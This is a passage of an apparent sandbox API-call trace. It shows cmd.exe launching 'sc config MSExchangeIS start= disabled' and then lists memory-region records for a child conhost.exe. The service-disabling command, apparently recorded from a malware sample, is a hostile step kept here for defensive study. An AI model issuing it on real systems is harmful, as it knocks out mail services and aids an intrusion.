lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.712] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.712] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0130.712] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0130.712] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0130.712] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0130.712] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0130.712] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0130.712] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0130.712] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0130.712] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0130.712] GetEnvironmentStringsW () returned 0x4e77d90* [0130.712] FreeEnvironmentStringsA (penv="A") returned 1 [0130.712] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.712] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.712] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0130.712] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0130.712] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0130.712] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0130.712] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0130.712] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0130.712] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0130.712] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0130.712] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4c9fb88 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0130.712] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4c9fb88, lpFilePart=0x4c9fb80 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4c9fb80*="Desktop") returned 0x1d [0130.712] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0130.713] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4c9f908 | out: lpFindFileData=0x4c9f908) returned 0x4e705c8 [0130.713] FindClose (in: hFindFile=0x4e705c8 | out: hFindFile=0x4e705c8) returned 1 [0130.713] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4c9f908 | out: lpFindFileData=0x4c9f908) returned 0x4e705c8 [0130.713] FindClose (in: hFindFile=0x4e705c8 | out: hFindFile=0x4e705c8) returned 1 [0130.713] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0130.713] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4c9f908 | out: lpFindFileData=0x4c9f908) returned 0x4e705c8 [0130.713] FindClose (in: hFindFile=0x4e705c8 | out: hFindFile=0x4e705c8) returned 1 [0130.713] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0130.713] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0130.713] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0130.713] GetEnvironmentStringsW () returned 0x4e77d90* [0130.713] FreeEnvironmentStringsA (penv="=") returned 1 [0130.713] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0130.714] GetConsoleOutputCP () returned 0x1b5 [0130.714] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0130.714] GetUserDefaultLCID () returned 0x409 [0130.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0130.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4c9fcb8, cchData=128 | out: lpLCData="0") returned 2 [0130.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4c9fcb8, cchData=128 | out: lpLCData="0") returned 2 [0130.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4c9fcb8, cchData=128 | out: lpLCData="1") returned 2 [0130.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0130.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0130.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0130.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0130.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0130.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0130.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0130.714] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0130.714] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0130.714] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0130.714] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0130.715] GetConsoleTitleW (in: lpConsoleTitle=0x4e7aa30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.715] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0130.715] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0130.715] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0130.715] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0130.716] _wcsicmp (_String1="sc", _String2=")") returned 74 [0130.716] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0130.716] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0130.716] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0130.716] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0130.716] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0130.716] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0130.717] GetConsoleTitleW (in: lpConsoleTitle=0x4c9f9a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.717] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0130.717] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0130.717] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0130.717] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0130.717] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0130.717] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0130.717] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0130.717] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0130.717] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0130.717] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0130.717] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0130.717] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0130.717] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0130.717] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0130.717] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0130.717] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0130.717] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0130.717] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0130.717] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0130.717] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0130.717] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0130.717] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0130.717] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0130.718] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0130.718] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0130.718] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0130.718] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0130.718] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0130.718] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0130.718] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0130.718] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0130.718] _wcsicmp (_String1="sc", _String2="START") returned -17 [0130.718] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0130.718] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0130.718] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0130.718] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0130.718] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0130.718] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0130.718] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0130.718] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0130.718] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0130.718] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0130.718] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0130.718] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0130.718] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0130.718] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0130.718] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0130.718] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0130.718] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0130.718] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0130.718] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0130.718] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0130.718] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0130.718] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0130.718] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0130.718] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0130.718] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0130.718] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0130.718] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0130.718] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0130.718] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0130.718] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0130.718] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0130.718] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0130.718] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0130.718] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0130.718] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0130.718] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0130.718] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0130.718] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0130.718] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0130.718] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0130.718] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0130.718] _wcsicmp (_String1="sc", _String2="START") returned -17 [0130.718] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0130.718] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0130.718] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0130.719] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0130.719] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0130.719] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0130.719] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0130.719] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0130.719] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0130.719] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0130.719] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0130.719] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0130.719] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0130.719] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0130.719] SetErrorMode (uMode=0x0) returned 0x0 [0130.719] SetErrorMode (uMode=0x1) returned 0x0 [0130.719] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4e705d0, lpFilePart=0x4c9f4ac | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4c9f4ac*="Desktop") returned 0x1d [0130.719] SetErrorMode (uMode=0x0) returned 0x1 [0130.719] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0130.719] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0130.727] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0130.727] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0130.727] GetConsoleTitleW (in: lpConsoleTitle=0x4c9f72c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.728] InitializeProcThreadAttributeList (in: lpAttributeList=0x4c9f658, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4c9f63c | out: lpAttributeList=0x4c9f658, lpSize=0x4c9f63c) returned 1 [0130.728] UpdateProcThreadAttribute (in: lpAttributeList=0x4c9f658, dwFlags=0x0, Attribute=0x60001, lpValue=0x4c9f644, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4c9f658, lpPreviousValue=0x0) returned 1 [0130.728] GetStartupInfoW (in: lpStartupInfo=0x4c9f690 | out: lpStartupInfo=0x4c9f690*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0130.728] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0130.729] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0130.730] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeIS start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4c9f5e0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeIS start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4c9f62c | out: lpCommandLine="sc config MSExchangeIS start= disabled", lpProcessInformation=0x4c9f62c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xf68, dwThreadId=0xf70)) returned 1 [0130.737] CloseHandle (hObject=0xa4) returned 1 [0130.737] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0130.737] GetEnvironmentStringsW () returned 0x4e79ef8* [0130.737] FreeEnvironmentStringsA (penv="=") returned 1 [0130.737] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0130.784] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4c9f5c4 | out: lpExitCode=0x4c9f5c4*=0x424) returned 1 [0130.784] CloseHandle (hObject=0xa8) returned 1 [0130.784] _vsnwprintf (in: _Buffer=0x4c9f6ac, _BufferCount=0x13, _Format="%08X", _ArgList=0x4c9f5cc | out: _Buffer="00000424") returned 8 [0130.784] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0130.785] GetEnvironmentStringsW () returned 0x4e7b368* [0130.785] FreeEnvironmentStringsA (penv="=") returned 1 [0130.785] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0130.785] GetEnvironmentStringsW () returned 0x4e7b368* [0130.785] FreeEnvironmentStringsA (penv="=") returned 1 [0130.785] DeleteProcThreadAttributeList (in: lpAttributeList=0x4c9f658 | out: lpAttributeList=0x4c9f658) [0130.785] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.785] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0130.785] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.785] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0130.785] _get_osfhandle (_FileHandle=0) returned 0x38 [0130.785] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0130.785] SetConsoleInputExeNameW () returned 0x1 [0130.785] GetConsoleOutputCP () returned 0x1b5 [0130.785] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0130.786] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.786] exit (_Code=1060) Thread: id = 471 os_tid = 0xf78 Process: id = "135" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x67f0d000" os_pid = "0xf84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "134" os_parent_pid = "0x960" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7448 start_va = 0x7fb5c000 end_va = 0x7fb5cfff entry_point = 0x0 region_type = private name = "private_0x000000007fb5c000" filename = "" Region: id = 7449 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7450 start_va = 0xcab7310000 end_va = 0xcab732ffff entry_point = 0x0 region_type = private name = "private_0x000000cab7310000" filename = "" Region: id = 7451 start_va = 0xcab7330000 end_va = 0xcab7343fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cab7330000" filename = "" Region: id = 7452 start_va = 0xcab7350000 end_va = 0xcab738ffff entry_point = 0x0 region_type = private name = "private_0x000000cab7350000" filename = "" Region: id = 7453 start_va = 0x7df5ff5b0000 end_va = 0x7ff5ff5affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff5b0000" filename = "" Region: id = 7454 start_va = 0x7ff6c46c0000 end_va = 0x7ff6c46e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c46c0000" filename = "" Region: id = 7455 start_va = 0x7ff6c46ed000 end_va = 0x7ff6c46eefff entry_point = 0x0 region_type = private name = "private_0x00007ff6c46ed000" filename = "" Region: id = 7456 start_va = 0x7ff6c46ef000 end_va = 0x7ff6c46effff entry_point = 0x0 region_type = private name = "private_0x00007ff6c46ef000" filename = "" Region: id = 7457 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 7458 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7459 start_va = 0xcab7310000 end_va = 0xcab731ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cab7310000" filename = "" Region: id = 7460 start_va = 0xcab7320000 end_va = 0xcab7326fff entry_point = 0x0 region_type = private name = "private_0x000000cab7320000" filename = "" Region: id = 7461 start_va = 0xcab7390000 end_va = 0xcab7390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cab7390000" filename = "" Region: id = 7462 start_va = 0xcab73a0000 end_va = 0xcab73a6fff entry_point = 0x0 region_type = private name = "private_0x000000cab73a0000" filename = "" Region: id = 7463 start_va = 0xcab73b0000 end_va = 0xcab73b0fff entry_point = 0x0 region_type = private name = "private_0x000000cab73b0000" filename = "" Region: id = 7464 start_va = 0xcab73c0000 end_va = 0xcab74bffff entry_point = 0x0 region_type = private name = "private_0x000000cab73c0000" filename = "" Region: id = 7465 start_va = 0xcab74c0000 end_va = 0xcab757dfff entry_point = 0xcab74c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7466 start_va = 0xcab7580000 end_va = 0xcab75bffff entry_point = 0x0 region_type = private name = "private_0x000000cab7580000" filename = "" Region: id = 7467 start_va = 0xcab75c0000 end_va = 0xcab75c0fff entry_point = 0x0 region_type = private name = "private_0x000000cab75c0000" filename = "" Region: id = 7468 start_va = 0xcab75f0000 end_va = 0xcab75fffff entry_point = 0x0 region_type = private name = "private_0x000000cab75f0000" filename = "" Region: id = 7469 start_va = 0xcab7600000 end_va = 0xcab7787fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cab7600000" filename = "" Region: id = 7470 start_va = 0xcab7790000 end_va = 0xcab7910fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cab7790000" filename = "" Region: id = 7471 start_va = 0xcab7920000 end_va = 0xcab8d1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cab7920000" filename = "" Region: id = 7472 start_va = 0x7ff6c45c0000 end_va = 0x7ff6c46bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c45c0000" filename = "" Region: id = 7473 start_va = 0x7ff6c46eb000 end_va = 0x7ff6c46ecfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c46eb000" filename = "" Region: id = 7474 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 7475 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 7476 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7477 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7478 start_va = 